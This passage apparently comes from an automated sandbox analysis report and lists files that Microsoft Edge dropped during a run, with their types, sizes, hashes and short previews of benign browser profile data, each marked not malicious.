                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):358
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.193099042730825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rfv4q2PcNwi23oH+Tcwt7Uh2ghZIFUt8O8RLcNJZmw+O8RLcNDkwOcNwi23oHT:7dvLZYebIhHh2FUt8Ocg/+OcI54ZYebs
                                                                                                                                                                                                                                                                                          MD5:FA967DB7E313B8076DA894609C02B920
                                                                                                                                                                                                                                                                                          SHA1:E841398A15AC878EBBFA17B59DC82226DA01045B
                                                                                                                                                                                                                                                                                          SHA-256:10AB89920358483ED9BCE3A3213269D5FAD63F8E7C5B52839E6AEFFDFD8151C8
                                                                                                                                                                                                                                                                                          SHA-512:9C7E6BF36872BFEAFF8571E3265A552E4C630EB148C58316A5B900BD4C81E872B0160638CD9EFE487985D4D68500B0CA7A24A46898A95A4C779955D41C6657FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.710 19d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-03:45:52.825 19d4 Recovering log #3.2024/12/19-03:45:52.825 19d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zEZlCll:/M/xT02zv
                                                                                                                                                                                                                                                                                          MD5:50B2E4A56B1824AE1FC2DAA70A971A84
                                                                                                                                                                                                                                                                                          SHA1:0A69059C919B01A6C221E859EAB3BEEEECFB6D91
                                                                                                                                                                                                                                                                                          SHA-256:A76892EBE1852C2149517932A1AA2905C3F0AF41951CC62AD7C4B0CB51B857EA
                                                                                                                                                                                                                                                                                          SHA-512:FAB40A873BF8E57539402C5173538C8847BF74E11CF51C34F8743DCC32F1B488BC06CDB4011DC774E3C7C9646F4888C5DFE0BDAE1CA98428BD81F291A8E85270
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):440
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.26439795867681
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7palL+vLZYebvqBQFUt8OpyC/+OpRLV54ZYebvqBvJ:7pa6lYebvZg8OpxpZoYebvk
                                                                                                                                                                                                                                                                                          MD5:4BB461C192AA44940D49A19DC0BD7EFB
                                                                                                                                                                                                                                                                                          SHA1:C0B52E7A235EDA7D74776B31FC7CCC173D0F7710
                                                                                                                                                                                                                                                                                          SHA-256:7CECBFBD3F1FD0F231774E13EBF7FDE2A417A36FF9B5A0BEFA2D97ABF4FF5F21
                                                                                                                                                                                                                                                                                          SHA-512:098AA03AA39038EDC86B9E3E68BDAC94D7FA61FF9BC5FAF1D84E9B69B40B65585BF12893FF142BF1EA2FE844A5C5E4CE951146116C3ECF842133715DD01D12B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.576 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.577 14ac Recovering log #3.2024/12/19-03:45:53.582 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):111
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                          MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                          SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                          SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                          SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2683972043844856
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7pGvLZYebvqBZFUt8Ocb/+OcKz54ZYebvqBaJ:7pElYebvyg8OqdloYebvL
                                                                                                                                                                                                                                                                                          MD5:AFACF2A7F2891A867691F741D813F021
                                                                                                                                                                                                                                                                                          SHA1:DB0112057A904003D90C38A7A7D9404FDD7331CE
                                                                                                                                                                                                                                                                                          SHA-256:D5241F2808F1B7646E62824CD0CD37D3369094CD5476C7FD8AFEE1E977E0CBE2
                                                                                                                                                                                                                                                                                          SHA-512:C7CED641FBE4FE6A13A8E40DD687D9C43F621458D527A650FC031AEAD699258D2D9D452AB3E5CFBF810CF52F8DBE898D9F9DC3CE2CA46E52C6EF25979D1961C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:46:11.363 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-03:46:11.401 788 Recovering log #3.2024/12/19-03:46:11.404 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.253221825776364
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RJAVq2PcNwi23oH+TcwtpIFUt8O8RLYrAgZmw+O8RLYrAIkwOcNwi23oH+Tcwd:7kAVvLZYebmFUt8OEIAg/+OEIAI54ZYM
                                                                                                                                                                                                                                                                                          MD5:E5000FFF656EF41336300974B2816DAC
                                                                                                                                                                                                                                                                                          SHA1:761E53062912767BBCDFB7A6BE7E2BE3D46289EC
                                                                                                                                                                                                                                                                                          SHA-256:3BB43DFDA06350771A9C285ACED844F9C9DDC43904EF183F33ABDBE42C60B936
                                                                                                                                                                                                                                                                                          SHA-512:D438EE85B994FAE5A153C69D8BCC20CFB99D96D9C4E4C3A7C53087C2BC4DEA9AAD8DF27AD7FD2940D5BD1E3699C3FF4B7031E871AE63FEF74DB73D9507DB2573
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.823 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-03:45:52.824 12b4 Recovering log #3.2024/12/19-03:45:52.824 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2651716274333387
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMPSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JP9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                                                          MD5:6F09A60146E610ADC2B476E720AD813E
                                                                                                                                                                                                                                                                                          SHA1:9F436B059B4DA13F94996B64B7EB688C55BC792A
                                                                                                                                                                                                                                                                                          SHA-256:5BAB95E2F29E66C62D9254172AE0F5ED4AAC9C5C0134648992932FEBCC86BEE7
                                                                                                                                                                                                                                                                                          SHA-512:5F68D788E50EC9C7F588C3A2EAD97C8AB64EA1B0CAD1A51147651A02C608865B081F4584004C8FEAE37F06611E116C3690343BF74E1C92043420A0003BBA576D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46680835700587137
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0eEpI:v7doKsKuKZKlZNmu46yjx0e4I
                                                                                                                                                                                                                                                                                          MD5:469AE2D5E045423731E426D0C88A39DB
                                                                                                                                                                                                                                                                                          SHA1:5660B2AA5942996E7C4F392DBA59B1793995E000
                                                                                                                                                                                                                                                                                          SHA-256:F10A979A97B84F19A2359C1EF2E67C5108A250EEB2196E6C9898662645F8F4F8
                                                                                                                                                                                                                                                                                          SHA-512:0981A7F7EA517814C0F4A7CD999AEAEF4E7EE88371EAD4667E68A4813CC40B5D082A4203CC1F15CE8FAA6FB18B17CA26BA34C17BE57E323F14D23C914E005031
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):12824
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.13684917502873026
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:ztUlF9eLPle4puj3dndQlKtU+eQ8hllFsD:x8HkdbQtS2U+S/S
                                                                                                                                                                                                                                                                                          MD5:F49E059E085B65661A67C8EA4282FF0B
                                                                                                                                                                                                                                                                                          SHA1:D2095BAF4C4A4E409BAB45A6AD57EBBE96B7CE14
                                                                                                                                                                                                                                                                                          SHA-256:712F3D7306A465E5E5848112FB26026496108A257CE8474A36426467683904C5
                                                                                                                                                                                                                                                                                          SHA-512:220AA3A97F4C14D68E6C7FF1E11905A3734D0320B7C54A1CE7175D1EA10C2640D8AA8C78163174451E6D135C4E102F4FB8F1640ECF59689923AE6CAD577FC362
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17563), with no line terminators
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):17563
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4840886311982935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbVS:stAPGQSu4UsyQtJxncOo70kbGZQwRrf
                                                                                                                                                                                                                                                                                          MD5:B695D8D6D9A65DFAD9D4A21AB8CC2C9E
                                                                                                                                                                                                                                                                                          SHA1:D46B402D942EF3ED01DE36E4E3B1D819644A9B24
                                                                                                                                                                                                                                                                                          SHA-256:5DBE95C18506C3427594EB77B8CC11296AAABCE16F662454CDFAF8B85099C902
                                                                                                                                                                                                                                                                                          SHA-512:A13ED60908A2C96D8BEAF077B18DF69E8BDF801B061D92E06099A3AFF31F9D5B28CA33D24025F8C5E01727081CC06258E7F7F6DF2C80738C95EEAAB763C7D8FD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
